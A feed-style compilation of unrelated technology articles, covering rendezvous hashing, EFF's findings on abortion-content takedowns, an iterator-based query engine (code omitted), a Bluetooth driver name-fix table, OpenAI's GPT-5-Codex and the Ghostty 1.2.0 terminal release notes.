First, we hash each server to get a set of integer hash values. Then, we sort the servers based on the hash values. The result is a randomly permuted list of servers. To ensure that each key gets a unique permutation, we also have to make the hash function depend on the key. But this is not difficult - the solution is to concatenate the key with each server or to use the server ID as a hash seed.
The final rendezvous hashing algorithm goes like this:
Hash all possible key-server combinations with a random hash function
Assign the key to the server with the largest hash value
Maintain the “first choice” invariant when adding and removing servers
Advantages of Rendezvous Hashing
Cascaded Failover:
When a server fails, many load balancing algorithms forward all of the load to a single server. This can lead to
cascaded failure
if the failover server cannot handle the new load. Rendezvous hashing avoids this problem because each key potentially has a different second-choice server. With a sufficiently good hash function,
2
the load from a failing server is evenly distributed across the remaining servers.
Weighted Servers:
In some situations, we want to do biased load balancing rather than uniform random key assignment. For example, some servers might have larger capacity and should therefore be selected more often. Rendezvous hashing accommodates weighted servers in a very elegant way. Instead of sorting the servers based on their hash values, we rank them based on \(-\frac{w_i}{\ln h_i(x)}\), where \(x\) is the key, \(w_i\) is the weight associated with server \(i\), and \(h_i(x)\) is the hash value (normalized to [0,1]). For more details, see
Jason Resch’s slides from SDC 2015
.
Lightweight Memory:
We only need a list of server identifiers to locate the server that manages a given key-value pair, since we can locally compute all of the hash function values. In practice, algorithms such as consistent hashing require more memory (but less computation).
Disadvantages of Rendezvous Hashing
Adding Servers:
It is hard to maintain the “first choice” invariant when adding servers because the new server might become the first choice for a key that is already in the system. To maintain the invariant, we would have to verify that all of the keys in the system are managed by the correct server. This is a serious problem for distributed storage and pub/sub systems because they route users to resources that are distributed throughout the system. If we break the invariant, we break the ability to locate resources (values) in the system.
However, this is not a problem for cache systems. In a cache system, users access data through fast, local servers that have shared access to a slow central data storage repository. When a user requests data from the system, we query the cache to see whether a local copy is available. If the cache doesn’t have a copy, we fetch the data from the central repository and cache it for next time.
We do not have to worry about adding servers to a cache because the system will eventually satisfy the “first choice” invariant by itself. If we add a server that becomes the first choice for an existing key, the new server will simply load the corresponding data after the first unsuccessful cache request. Now that the new server is responsible for the key, the old server that previously managed the key will no longer receive any more requests for the data. Since most caches evict data on an LRU (least recently used) basis, we will eventually flush any stale data copies from the system. This effectively implements the “first choice” invariant without requiring any effort.
Query Time:
If we have \(N\) servers, the lookup algorithm is \(O(N)\) because we have to examine all of the key-server combinations. Consistent hashing is \(O(\log N)\) and can be much faster when \(N\) is large enough.
Conclusion
Rendezvous hashing is a good way to do distributed load balancing for small to medium-sized distributed caches. If working with a system that does not eventually satisfy the “first choice” invariant, rendezvous hashing will require some care when scaling up the number of servers.
No preview for link for known binary extension (.pdf), Link: https://cdn.openai.com/pdf/a253471f-8260-40c6-a2cc-aa93fe9f142e/economic-research-chatgpt-usage-paper.pdf.
California reached the unthinkable: A union deal with tech giants
Our Stop Censoring Abortion Campaign Uncovers a Social Media Censorship Crisis
Electronic Frontier Foundation
www.eff.org
2025-09-15 20:07:16
This is the first installment in a blog series documenting EFF's findings from the Stop Censoring Abortion campaign. You can read additional posts here.
We’ve been hearing that social media platforms are censoring abortion-related content, even when no law requires them to do so. Now, we’ve got the...
This is the first installment in a blog series documenting EFF's findings from the
Stop Censoring Abortion
campaign. You can read additional posts
here
.
We’ve been hearing that social media platforms are censoring abortion-related content, even when no law requires them to do so. Now, we’ve got the receipts.
For months, EFF has been investigating stories from users whose abortion-related content has been taken down or otherwise suppressed by major social media platforms. In collaboration with our allies—including
Plan C
,
Women on Web
,
Reproaction
, and
Women First Digital
—we launched the
#StopCensoringAbortion campaign
to collect and amplify these stories.
Submissions came from a variety of users, including personal accounts, influencers, healthcare clinics, research organizations, and advocacy groups from across the country and abroad—a spectrum that underscores the wide reach of this censorship. Since the start of the year, we’ve seen nearly 100 examples of abortion-related content taken down by social media platforms.
We analyzed these takedowns, deletions, and bans, comparing the content to what platform policies allow—particularly those of Meta—and found that
almost none of the submissions we received violated any of the platforms’ stated policies.
Most of the censored posts simply provided factual, educational information. This Threads post is a perfect example:
Screenshot submitted by Lauren Kahre to EFF
In this post, health policy strategist Lauren Kahre discussed abortion pills’ availability via mail. She provided factual information about two FDA approved medications (mifepristone and misoprostol), including facts like shelf life and how to store pills safely.
Lauren’s post doesn’t violate any of Meta’s policies and shouldn’t have been removed. But don’t just take our word for it:
Meta has publicly insisted that posts like these should
not
be censored.
In a
February 2024 letter to Amnesty International
, Meta Human Rights Policy Director Miranda Sissons wrote: “Organic content (i.e., non paid content) educating users about medication abortion is allowed and does not violate our Community Standards. Additionally, providing guidance on legal access to pharmaceuticals is allowed.”
Still, shortly after Lauren shared this post, Meta took it down. Perhaps even more perplexing was their explanation for doing so. According to Meta, the post was removed because “
[they] don’t allow people to buy, sell, or exchange drugs that require a prescription from a doctor or a pharmacist.”
Screenshot submitted by Lauren Kahre to EFF
In the submissions we received, this was the most common reason Meta gave for removing abortion-related content. The company frequently claimed that posts violated
policies on Restricted Goods and Services
,
which prohibit any “attempts to buy, sell, trade, donate, gift or ask for pharmaceutical drugs.”
Yet in Lauren’s case and others,
the posts very clearly did no such thing.
And as
Meta itself has explained
: “Providing guidance on how to legally access pharmaceuticals is permitted as it is
not
considered an offer to buy, sell or trade these drugs.”
In fact, Meta’s policies on Restricted Goods & Services further state: “We allow discussions about the sale of these goods in stores or by online retailers, advocating for changes to regulations of goods and services covered in this policy, and advocating for or concerning the use of pharmaceutical drugs in the context of medical treatment, including discussion of physical or mental side effects.” Also, “Debating or advocating for the legality or discussing scientific or medical merits of prescription drugs is allowed. This includes news and public service announcements.”
Over and over again, the policies say one thing, but the actual enforcement says another.
We spoke with multiple Meta representatives to share these findings. We asked hard questions about their policies and the gap between how they’re being applied. Unfortunately, we were mostly left with the same concerns, but we’re continuing to push them to do better.
In the coming weeks, we will share a series of blogs further examining trends we found, including stories of unequal enforcement, where individuals and organizations needed to rely on internal connections at Meta to get wrongfully censored posts restored; examples of account suspensions without sufficient warnings; an exploration of Meta’s ad policies; practical tips for users to avoid being censored; and concrete steps platforms should take to reform their abortion content moderation practices. For a preview, we’ve already shared some of our findings with
Barbara Ortutay at The Associated Press
, whose
report
on some of these takedowns was published today
.
We hope this series highlighting examples of abortion content censorship will help the public and the platforms understand the breadth of this problem, who is affected, and with what consequences. These stories collectively underscore the urgent need for platforms to review and consistently enforce their policies in a fair and transparent manner.
With
reproductive rights under attack
both in the U.S. and abroad, sharing accurate information about abortion online has never been more critical. Together, we can hold platforms like Meta accountable, demand transparency in moderation practices, and ultimately stop the censorship of this essential, sometimes life-saving information.
Let's write a super simply query engine using the iterator model. Something like this is conceptually what the compilation target for something like SQL generally looks like.
Our iterators will be
next
able, and return
None
when they're exhausted. We can construct an iterator over some fixed set of values easily:
Of course, the value of this model is that it's composable: we can derive iterators from other iterators, like having a
Filter
iterator that only allows rows through meeting some predicate:
Another useful primitive for such a query engine to have is a
product
operator, which takes two iterators and emits their cross product. This is actually a little trickier than it might seem, because we have no way to reverse our iterators: we can only
next
them. This means we have to buffer up the rows from the left iterator so that we can maintain a pointer into it, but this isn't a big deal:
One observation we might have without thinking too hard is that we need not be restricted to our relations being
finite
here. We could write the following iterator:
That seems...probably wrong. The issue is with our implementation of
UnionIter
: we're only looking at the second iterator once our first iterator is completely exhausted, which, in this case, since the first iterator is infinite, will never happen!
There's a way to make precise the fact that this implementation is wrong: when we take the union of two iterators, we want it to be true that
if we would eventually get
x
by calling
next
on one of the iterators in isolation, we should eventually get
x
by calling
next
on the union
. The reason this is a useful correctness condition is because it suggests that nothing can be "infinitely delayed." If there's something we need to hit, then we are assured that if we go long enough, we will hit it.
It's easy to see that this condition is not true for our current implementation of union: if we called
next
on
neg
, we would immediately hit
-1
, but calling
next
on our union, we will never get it.
This is easy to fix by changing the implementation of union to interleave the two iterators, rather than concatenate them:
Our program doesn't even run: we're trying to buffer all of
NatIter
, which will never finish. But, even if we could solve that problem, we would still have another: the intention for
product
is that we enumerate every pair between the two inputs, and we can visualize this by an infinite two-dimensional grid:
The problem is that the way our program works now, we will only enumerate along the leftmost arrow, and never see anything to the right of it.
We can borrow another trick from the theory of countable sets to solve this.
The problem right now is that we've divided this infinite grid up into an infinite set of infinite columns. Which means that if we want to enumerate all of the cells, we must first enumerate all of a column, which is, again, infinite. A better (and common, in this world) thing to do is to break up the grid into an infinite list of finite
diagonals
:
If we go through each diagonal in turn, we're guaranteed that we'll hit every square eventually.
For our purposes it will be a little simpler to traverse the grid like this, by continually growing rectangles, but the result is the same:
It's a little ugly to implement this traversal so I'm going to hide my implementation behind a
gist link
, if you have a really nice way let me know. The result is that we can iterate over our joined natural number relations just fine:
Some time ago, people noticed that buried in the Windows Bluetooth drivers is the hard-coded name of the Microsoft Wireless Notebook Presenter Mouse 8000. What’s going on there? Does the Microsoft Wireless Notebook Presenter Mouse 8000 receive favorable treatment from the Microsoft Bluetooth drivers? Is this some sort of collusion?
Most of the time, the code to compensate for these types of errors doesn’t betray its presence in the form of hard-coded strings. Instead, you have “else” branches that secretly repair or ignore corrupted values.
Unfortunately, the type of mistake that the Microsoft Wireless Notebook Presenter Mouse 8000 made is one that is easily exposed via strings, because they messed up their string!
The device local name string is
specified to be encoded in UTF-8
. However, the Microsoft Wireless Notebook Presenter Mouse 8000 reports its name as
Microsoft
⟪AE⟫
Wireless Notebook Presenter Mouse 8000
, encoding the registered trademark symbol ® not as UTF-8 as required by the specification but in code page 1252. What’s even worse is that a bare
⟪AE⟫
is not a legal UTF-8 sequence, so the string wouldn’t even show up as corrupted; it would get rejected as invalid.
Thanks, Legal Department, for sticking a ® in the descriptor and messing up the whole thing.
There is a special table inside the Bluetooth drivers of “Devices that report their names wrong (and the correct name to use)”. If the Bluetooth stack sees one of these devices, and it presents the wrong name, then the correct name is substituted.
That table currently has only one entry.
Author
Raymond has been involved in the evolution of Windows for more than 30 years. In 2003, he began a Web site known as The Old New Thing which has grown in popularity far beyond his wildest imagination, a development which still gives him the heebie-jeebies. The Web site spawned a book, coincidentally also titled The Old New Thing (Addison Wesley 2007). He occasionally appears on the Windows Dev Docs Twitter account to tell stories which convey no useful information.
GPT‑5-Codex and upgrades to Codex
Simon Willison
simonwillison.net
2025-09-15 19:55:35
GPT‑5-Codex and upgrades to Codex
OpenAI half-released a new model today: GPT‑5-Codex, a fine-tuned GPT-5 variant explicitly designed for their various AI-assisted programming tools.
I say half-released because it's not yet available via their API, but they "plan to make GPT‑5-Codex available in the...
GPT‑5-Codex and upgrades to Codex
. OpenAI half-released a new model today: GPT‑5-Codex, a fine-tuned GPT-5 variant explicitly designed for their various AI-assisted programming tools.
I say half-released because it's not yet available via their API, but they "plan to make GPT‑5-Codex available in the API soon".
At this point it's best to think of
Codex
as OpenAI's brand name for their coding family of models and tools.
The new model is already integrated into their VS Code extension, the Codex CLI and their Codex Cloud asynchronous coding agent. I'd been calling that last one "Codex Web" but I think Codex Cloud is a better name since it can also be accessed directly from their iPhone app.
Codex Cloud also a new feature: you can configure it to automatically run code review against specific GitHub repositories (I found that option on
chatgpt.com/codex/settings/code-review
) and it will create a temporary container to use as part of those reviews. Here's the
relevant documentation
.
Some documented features of the new GPT-5-Codex model:
Specifically trained for code review, which directly supports their new code review feature.
"GPT‑5-Codex adapts how much time it spends thinking more dynamically based on the complexity of the task." Simple tasks (like "list files in this directory") should run faster. Large, complex tasks should use run for much longer - OpenAI report Codex crunching for seven hours in some cases!
Increased score on their proprietary "code refactoring evaluation" from 33.9% for GPT-5 (high) to 51.3% for GPT-5-Codex (high). It's hard to evaluate this without seeing the details of the eval but it does at least illustrate that refactoring performance is something they've focused on here.
"GPT‑5-Codex also shows significant improvements in human preference evaluations when creating mobile websites" - in the past I've habitually prompted models to "make it mobile-friendly", maybe I don't need to do that any more.
"We find that comments by GPT‑5-Codex are less likely to be incorrect or unimportant" - less unimportant comments in code is definitely an improvement!
Theo Browne
has a video review
of the model and accompanying features. He was generally impressed but noted that it was surprisingly bad at using the Codex CLI search tool to navigate code. Hopefully that's something that can fix with a system prompt update.
Finally, can it drew a pelican riding a bicycle? Without API access I instead got Codex Cloud to
have a go
by prompting:
Generate an SVG of a pelican riding a bicycle, save as pelican.svg
Ghostty 1.2.0 features
6 months of work
with changes from
149 contributors
over
2,676 commits
. Thank you to all the contributors,
maintainers, community moderators, translators, packagers, and users
who each helped make this release possible. This release contains major
improvements to every part of Ghostty, including hundreds of bug fixes.
macOS:
GHSA-q9fg-cpmh-c78x
.
Fixed an issue where Ghostty can be used as a vector for privilege
escalation from other vulnerable or malicious sources. This requires a
vulnerable application outside of Ghostty to initiate this chain of events.
As such, this is considered a low risk advisory.
On macOS, Ghostty 1.2 ships with a new macOS Tahoe compatible icon shown
below. This icon is built with the new Icon Composer application and allows
the icon to work with all of the new macOS light, dark, translucent, and
custom tinting styles.
On GTK (Linux and FreeBSD), Ghostty 1.2 ships with a new icon that better
matches
many
desktop environments. We chose to align with the GNOME styling
since that is common and doesn't generally look out of place in most
environments.
It's impossible to make a perfect, globally consistent icon for the Linux and
BSD ecosystem due to the diversity of desktop environments. We believe this
icon looks better in more environments than the prior icon, and avoids some
negative reactions that the prior icon demonstrated a macOS-centric point of
view.
Ghostty now has a command palette that can invoke most keybind actions,
such as creating new terminals, moving focus, changing text selection,
copy and paste, etc.
The command palette is bound by default to
ctrl+shift+p
on GTK and
cmd+shift+p
on macOS. This can be rebound to any keybind using the
toggle_command_palette
keybind action. The command palette is also available
via the menubar on both macOS and GTK.
The command palette exposes almost every available keybind. As new keybind
actions are added to Ghostty, they will be automatically available in the
command palette as well. This has some immediate benefits, namely that you can
access keybind actions even if they aren't bound to a keybind. This is useful
for infrequently used actions.
For example, I personally find myself using the
move_tab
action via the
command palette frequently, but not frequently enough to justify binding it.
In future versions of Ghostty, we'll continue to expand the features that
are available in the command palette. For example, we're working on a new
terminal sequence specification that would allow terminal programs to expose
any of their actions directly in the command palette (e.g. imagine Neovim
commands being fully available in the command palette).
A new configuration
quick-terminal-size
can now configure the default size
of the quick terminal. This was one of the most highly requested features.
The
quick-terminal-size
configuration supports both percentage and pixel
size. If you specify only one value, it specifies the size of the primary
axis (depending on the location). If you specify two values, then the second
value is the secondary axis. The example below illustrates:
# Percentage, primary axis only
quick-terminal-size = 25%
# Pixels work too, primary axis only
quick-terminal-size = 600px
# Two values specify primary and secondary axis
quick-terminal-size = 25%,75%
# You can also mix units
quick-terminal-size = 300px,80%
The
primary axis
is defined by the
quick-terminal-position
configuration.
For the
top
and
bottom
values, the primary axis is the height. For
the
left
and
right
values, the primary axis is the width. For
center
,
it depends on your monitor orientation: it is height for landscape and width for
portrait.
Beyond simply specifying the size, the quick terminal is now resizable at
runtime and will remember that size for the duration that Ghostty is running.
In prior versions, the size was fixed, which caused real problems depending
on monitor size and resolution.
Screenshots with a couple examples on GTK are shown below:
Ghostty now has opt-in shell integration features to make Ghostty more
compatible with SSH for remote machines that haven't updated to support
Ghostty's terminfo
.
The new
ssh-env
opt-in feature will automatically set the
TERM
variable
to
xterm-256color
for SSH sessions (as well as forward some other
environment variables to make sessions work better). While not strictly correct,
this band-aid solution helps more than it hurts in most cases.
The new
ssh-terminfo
opt-in feature will automatically copy the Ghostty
terminfo to the remote machine so that the proper
xterm-ghostty
TERM
setting can be used and remote programs can take full advantage of all of
Ghostty's features (and avoid xterm features we don't support).
Both of these features are opt-in because they require overriding the
ssh
command in your shell. This operation is not without risk, so we want to make
sure users are aware of what they're doing. We do our best to make this
stable and reliable, but there are edge cases we can't account for. As such,
this is still a work-in-progress and we welcome feedback.
The renderer backends have been reworked so that the core logic is shared,
whether rendering with OpenGL or Metal. This change will allow for quicker
improvements to that area of the code in the future, and will also help to
ensure feature parity between the two backends, which is something that was
starting to become an issue as many features were implemented for Metal but
not for OpenGL.
In the process of this rework, several improvements were made for the OpenGL
backend, which should now be more efficient and has near feature parity with
the Metal backend.
This means that Linux users will now see proper linear alpha blending, which
removes artifacts seen around the edges of text with certain combinations of
background and foreground color. The default
alpha-blending
configuration
value on Linux is now
linear-corrected
, which performs linear blending with
a correction step for text so that the apparent weight matches the non-linear
blending that people are used to.
This rework also made it so that custom shaders can now be hot reloaded.
Custom shaders are now provided information about the terminal cursor, so that
custom effects and animations can be applied to it, like a trail or smear.
The example below shows a
"cursor blaze" shader
that leaves a trail behind the cursor as it moves:
Cursor shaders and custom shaders in general are not for everyone, but
we've seen some incredibly creative shaders from the community. A lot of
people are having a lot of fun, and beyond simple eye candy they can be
practically useful too, such as making the cursor easier to follow as it
moves (but perhaps less loudly).
We do eventually plan to add a first-party animated cursor, so that users don't
need to take on the additional performance cost of a custom shader just to have
a cursor that's easier to follow as it moves, but adding this feature to custom
shaders was an easy stop-gap measure. Plus, this will still be useful even after
we add the first-party animated cursors, since some users may still want to have
very specific custom effects that aren't possible through the built-in option.
You can now specify a background image for your terminal using the
background-image
configuration. This comes with a set of other
configurations so that the image appears just how you'd like it:
background-image-opacity
,
background-image-position
,
background-image-fit
, and
background-image-repeat
.
In Ghostty 1.2.0, the background image is duplicated in VRAM for each
terminal. For sufficiently large images and many terminals, this can lead to a
large increase in memory usage (specifically VRAM). A future Ghostty release
will share image textures across terminals to avoid this issue.
As far as we know, we believe Ghostty is the first terminal emulator on
macOS to support this feature. Multiple terminals other than Ghostty on both
Linux and Windows already support this feature.
Progress bars can show success/error states, numerical progress towards
completion, indeterminate progress (pulsing), and more. Programs like
Amp
are already utilizing the progress bar today to
show activity, as shown below:
Graphical progress bars are now supported by multiple terminals across Windows,
Linux, and macOS as well as a handful of major terminal programs such as
the systemd and Zig CLIs. We hope, given the growing terminal support, that more
programs will start using this feature.
Today, Ghostty shows a simple, basic progress bar at the top of the terminal.
In future versions, we will expand progress so it is shown in tab headers,
task bars, dock icons, etc.
The progress report
OSC 9;4
sequence collides with the iTerm2 notification
sequence. Ghostty is the only emulator to support both sequences. To handle
this,
OSC 9;4
always parses as a progress report, meaning you can't send any
notifications starting with
;4
as notifications. We think this is a
reasonable trade-off given the extremely specific text and the wider support
for the more recommended
OSC 777
notification sequence.
When the font(s) you configured for Ghostty don't have a glyph for a character
we need to render, we find a font on the system that does. These fonts are now
adjusted in size to better match the primary font. This is similar (but
not identical) to
font-size-adjust
in CSS
.
This helps account for the differing sizes of fonts, and creates a generally
more consistent appearance. This is also helpful for users who use multiple
writing systems; for example, CJK (Chinese, Japanese, and Korean) text now
avoids having large vertical "gutters" between characters.
Ghostty 1.1.3 (Old)
Ghostty 1.2.0 (New)
The example above is a subtle difference. The difference is more apparent
when many differing font faces get used in a single line. To ensure we were
on the right path, we also polled a number of Chinese readers within
the community and feedback leaned strongly positive towards the new behavior.
In the future, we plan to rework font configuration so that you can specify
sizes per-font, or let a configured font be sized automatically like fallback
fonts are.
A variety of new characters are now drawn directly by Ghostty instead of having
to rely on a font for them. We draw glyphs directly so that we can ensure they
align correctly with the cell and each other.
An example of just a fraction of the newly supported glyphs is shown below.
Notice how the glyphs align perfectly with each other along the cell edges
with no gaps in between. This kind of pixel-perfect rendering is very important
for TUI applications that use glyphs such as these for UI elements.
Ghostty 1.1.3 (Old)
Ghostty 1.2.0 (New)
PRs:
#7809
, and subsequent PRs to fix minor issues
The built-in Nerd Font symbols are now provided by a standalone symbols-only
font, rather than using patched versions of JetBrains Mono in Regular, Bold,
Italic, and Bold Italic styles, and the built-in JetBrains Mono now uses a
variable font rather than 4 static ones. This makes it so that the embedded
fonts in Ghostty take significantly less space than they used to.
This also means we're now using a more up-to-date copy of the Nerd Fonts
symbols, so newer symbols will now render correctly.
The big change, however, is that Ghostty now automatically resizes Nerd Fonts
symbols to match the cell size, in the same way that the official Nerd Fonts
patcher does, which means that the experience of using Ghostty with a normal
un-patched font should be nearly or completely identical to using it with a
patched font before.
This means that there is now
no reason
to use patched fonts in Ghostty, since
things like powerline glyphs will always be scaled appropriately for the cell
size either way.
We've reworked our keybindings to be more consistent, based on the
W3C key event code specification
.
This work should result in more predictable, working keybindings across
operating systems and keyboard layouts, but also brings with it some
major behavior changes that may break existing keybindings.
All single codepoint characters now match the character produced by the
keyboard layout (i.e. are layout-dependent). So
ctrl+c
matches the
physical "c" key on a US standard keyboard with a US layout, but matches
the "i" key on a Dvorak layout. This also works for international characters.
Codepoints are case-insensitive and match via Unicode case folding (this is
how both Windows and macOS treat keyboard shortcuts).
All other key names match physical keys, and the key names are named
according to the W3C key codes. Example:
ctrl+KeyA
will always match the "a"
key on a US physical layout (the name
KeyA
lining up with US keyboards is
mandated by the spec, not us). Note when we say "physical" here we mean the
keycode sent by the OS or GUI framework; these can often be overridden
using programs to remap keys at the "hardware" level but software layouts
do not do this.
As a result of the above,
the
physical:
prefix has been removed.
Physical keybinds are now explicit through the use of multi-codepoint key
names as noted above. Previous
physical:
keybinds continue to work but
should be updated to the new format.
For backwards compatibility, all existing key names in Ghostty that didn't
match W3C map to their W3C equivalent. For example,
grave_accent
maps to
backquote
.
Ghostty on both macOS and GTK support the terminal bell (ASCII
BEL
or
0x07
). Ghostty's behavior when the bell is rung can be customized using
the
bell-features
configuration. We've shipped with defaults which we believe
are the least intrusive while still being useful, and more intrusive optional
features can be set with
bell-features
.
On macOS, the bell by default will put the bell emoji (🔔) in the title of
the terminal, will bounce the dock icon once, and will put a badge on the
Ghostty icon visible in the dock and application switcher. No audio will be
played.
On GTK, the bell by default will put the bell emoji (🔔) in the title of
the terminal and will mark the window as requesting attention. The exact
behavior of "requesting attention" is determined by the window manager or
desktop environment. No audio will be played.
GTK also supports an audio bell feature which is off by default. This can be
enabled with
bell-features=audio
. You can even specify custom audio to
play using the
bell-audio-path
configuration. The
bell-features=system
feature (default off) will use the "system beep" which usually can be audio
as well, configured via a central system setting.
GTK also supports a border flashing animation that can be enabled with
bell-features=border
. This is similar to the "visual bell" feature provided
by other terminal emulators.
A future version of Ghostty will bring parity to macOS with all the bell
features.
Ghostty 1.2 includes dozens of improvements to core terminal emulation to
ensure terminal programs work consistently and correctly in Ghostty as they
do in other terminal emulators. You can find the full list of related changes
in the
terminal capabilities
section.
The improvements range from very minor (
#7443
, a sequence not used by any
known program in the wild) to very important (
#8590
, which broke some real
programs). In any case, Ghostty takes terminal emulation compatibility very
seriously and we work hard to ensure that Ghostty can support the wide
spectrum of terminal features that exist.
Getting this right is easier said than done: a very small subset of terminal
emulation functionality is formally specified, with the vast majority
being defined by de facto standards based on how terminal emulators behave.
Additionally, since no singular standards body exists, protocols often
conflict with each other and we're left determining which protocol is more
important or how we can compromise to support both.
For example, the
progress bars
sequence
collides with the iTerm2 desktop notification sequence. As a compromise,
any unambiguous progress bar sequence takes priority over notifications,
so if you wanted to send a notification that exactly said the sequence to
set a progress bar, it will not work. This is a compromise Ghostty made
so that we can be one of the only terminals to support both progress bars
and iTerm2 desktop notifications.
1
Ghostty 1.2 adds support for macOS 26 (Tahoe).
When running on macOS 26, Ghostty will use the new Liquid Glass style. The
app icon has been updated
to support macOS 26 features such as light, dark, tinting, etc.
A number of UI details have been updated to better match the new macOS style,
such as icons in menu bars. In addition to visual support, a number of
compatibility issues were also fixed.
Ghostty 1.2 remains fully compatible with prior macOS versions back to
and including macOS 13 (Ventura).
Ghostty 1.1.x is functional on macOS 26. Due to the way macOS SDKs work,
Ghostty 1.1.x will use the old pre-Tahoe UI styling. There are still some
compatibility issues, but it is largely functional if you are unable to
upgrade to Ghostty 1.2 in the near term.
All operations that close a terminal now support undo and redo using
standard macOS keybinds (
Cmd+Z
and
Cmd+Shift+Z
, but can be rebound).
This includes closing a split, closing a tab, closing a window, closing
all windows, closing other tabs, etc.
Undo/redo works by keeping recently closed terminals running but hidden
for a configurable amount of time (by default 5 seconds). During this time,
you can undo the close and the terminal will be reopened in the same location
as before. Since the terminal was always running, your exact terminal state
is restored.
The time that a terminal can be undone can be configured with the
undo-timeout
configuration.
In future versions of Ghostty we plan to expand the GUI interactions
that can be undone and redone, such as resizing splits, moving tabs, etc.
Ghostty on macOS now integrates with Apple Shortcuts. This enables a Ghostty
to be scripted on macOS, especially when combined with non-Ghostty-specific
shortcut actions like taking screenshots, moving windows, etc.
Apple Shortcuts can be bound to global shortcuts, synced across devices,
and more. It is a really powerful tool!
This feature doesn't replace our future plans for a full cross-platform
Ghostty API. This macOS-specific feature does address many of those use cases
for macOS users, but we still plan to build alternate scripting choices in
the future.
The quick terminal is now supported on Linux while running on Wayland
with access to the
widely supported
wlr-layer-shell
protocol
.
The quick terminal has been available on macOS since Ghostty 1.0.
As a reminder, the "quick terminal" is the feature of Ghostty where a
singleton window of a terminal can be shown and hidden with a single
hotkey bound to
toggle_quick_terminal
(usually a global hotkey that
works even when Ghostty isn't focused). This is sometimes referred to
as a "dropdown terminal" or a "DOOM-style terminal."
The quick terminal on Linux fully supports tabs and splits.
The GTK application now supports global keybinds, keybinds that
work even while Ghostty is not the focused application. These keybinds
are defined with the
global:
prefix in the Ghostty configuration.
Global keybinds require a functional XDG desktop portal installed on your
system. Other parts of Ghostty already rely on XDG desktop portal, so it likely
already exists. If not, it's usually a single well-supported package away (plus
a restart).
Global keybinds support any keybind action but are particularly well
suited when paired with features such as
toggle_quick_terminal
, which is
now
also supported on GTK
.
Preliminary support for localization of the GTK application has been added.
Currently, only GTK GUI elements are translated. Localization support for
macOS and other parts of Ghostty will arrive in future releases.
Ghostty 1.2 has complete localization for GUI elements for the following
locales:
bg_BG
ca_ES
de_DE
es_AR
es_BO
fr_FR
ga_IE
he_IL
hu_HU
id_ID
it_IT
ja_JP
ko_KR
mk_MK
nb_NO
nl_NL
pl_PL
pt_BR
ru_RU
tr_TR
uk_UA
zh_CN
Localization is done by volunteers for each locale. The Ghostty project
is extremely grateful to the volunteers who have contributed their time
to localize Ghostty. If you would like to localize Ghostty to your locale,
please see the
CONTRIBUTING.md
documentation for instructions.
The Ghostty GTK application now supports FreeBSD. This work was driven
almost completely by a single community member, who did the hard work of
submitting patches to all our dependencies to support FreeBSD, updating
our build scripts, and assisting with automated testing to ensure Ghostty
remains functional on FreeBSD.
In addition to building and running properly on FreeBSD, the community
is developing a FreeBSD port to make installation easier. We will update
the installation documentation when that port is available.
We've rewritten the entire GTK application from the ground up using the
full
GObject type system
.
Throughout the process, we tested every feature with
Valgrind
to check for memory leaks, undefined memory access, use-after-free, and more.
See the original PR for full motivations, but the result is a more stable,
modern GTK application that is much more maintainable for contributors.
The GTK application in 1.1.3 had some known memory leaks that required
Ghostty to be restarted after very extended periods of time. Terminals
are usually never closed for many developers and no application should require
restarts. The GTK application now is completely stable and tip users
have reported no issues keeping it running for weeks at a time.
This doesn't just benefit GTK users: as a result of this work, we now
run all Ghostty unit tests under Valgrind for every commit (
#8309
).
Over 90% of our unit tests cover cross-platform code, so this helps
ensure that all of Ghostty is more stable and reliable.
Valgrind is only able to detect memory issues in executed code paths. We
exercised every possible GUI interaction, but we didn't exercise every
possible code path in Ghostty.
macOS:
The minimum required macOS version for Ghostty 1.2 remains
unchanged (macOS 13 Ventura). Ghostty is now compatible with macOS 26 (Tahoe).
GTK:
Ghostty 1.2 requires
GTK 4.14
and
libadwaita 1.5
. This
aligns with our
GTK/Adwaita version policy
.
Systems with older GTK or Adwaita versions can workaround this requirement
by using an older version of Ghostty or a community-maintained snap or
flatpak package.
GTK: libadwaita is now required. We've
warned that this was coming
since the 1.1.0 release notes and our motivations are well explained in
the prior link. Please read that carefully before reacting! We put out a
call for feedback from the community and discussed this decision at length.
We shipped features addressing those concerns such as our SSD support, first
class CSS styling, and more.
GTK: The minimum required OpenGL version is now 4.3. This was required
to improve performance, fix some rendering bugs more easily, and make our
OpenGL backend more maintainable. OpenGL 4.3 was released in 2012, so this is
still over a decade old.
#7620
Bundled themes have been updated to
release-20250915-154825-b4500fc
.
Since the themes are managed upstream, this may include theme renames
and color changes.
If your theme that was working in 1.1.3 stops working
when updating to 1.2, please check the linked release to verify your theme
name.
The
dlig
font feature is now disabled by default. This may result in
ligatures that were previously working to no longer work. This was always
formally specified as a "discretionary ligature" feature, meaning that it
should be opt-in. The more common
calt
(contextual ligature) feature remains
on by default. You can re-enable this feature with the
font-features
config.
#8164
The list below contains deprecations that remain compatible today through
a compatibility layer, but may break in a future release if they are
ignored:
adw-toolbar-style
has been renamed to
gtk-toolbar-style
.
gtk-tabs-location=hidden
is replaced with
window-show-tab-bar=never
.
selection-invert-fg-bg
is replaced with
selection-foreground=cell-background
and
selection-background=cell-foreground
.
#5219
cursor-invert-fg-bg
is replaced with
cursor-color=cell-foreground
and
cursor-text=cell-background
.
#5219
There is no set timeline to remove these deprecations, but we recommend
adapting to the new configurations sooner rather than later to avoid
any possible disruptions in the future.
The deprecations above will continue to work without any visible warnings. We
plan to augment our GUI to show warnings about the configuration in a future
release.
In each section, we try to sort improvements before bug fixes.
Commands through
-e
no longer are run wrapped with
/bin/sh
and instead are executed directly.
#7032
Add a new command palette feature to macOS and GTK that allows
executing most keybind actions even if they aren't bound.
#7153
#7156
Directional
goto_split
on both macOS and GTK navigates to the nearest
split in that direction from the top-left corner of the current split.
We call this "spatial navigation" and it results in more intuitive split
navigation.
#574
The
equalize_splits
keybind action now produces more expected, pleasing
results when multiple splits are oriented in the same direction.
#7710
New opt-in shell integration features
ssh-terminfo
and
ssh-env
improve the experience of using Ghostty over SSH.
#7608
Cursor information is now available to custom shaders, enabling custom
shaders to do things such as draw cool animations for cursor movement.
#7648
A new CLI command
+edit-config
will open the Ghostty configuration
in your configured terminal
$EDITOR
.
#7668
Add a new keybind
prompt_surface_title
that can be used to change
the title of a terminal manually.
#2509
#5769
Add a new keybind
scroll_to_selection
which scrolls the viewport
to the top-left of the current selection, if it exists.
#7265
Add a new keybind
set_font_size
to set the font size.
#7795
Add a new keybind
copy_title_to_clipboard
that copies the current terminal title
to the clipboard.
#7829
Add a new keybind
close_tabs:other
that closes all tabs except the
current one.
#8363
The keybinds
write_screen_file
,
write_scrollback_file
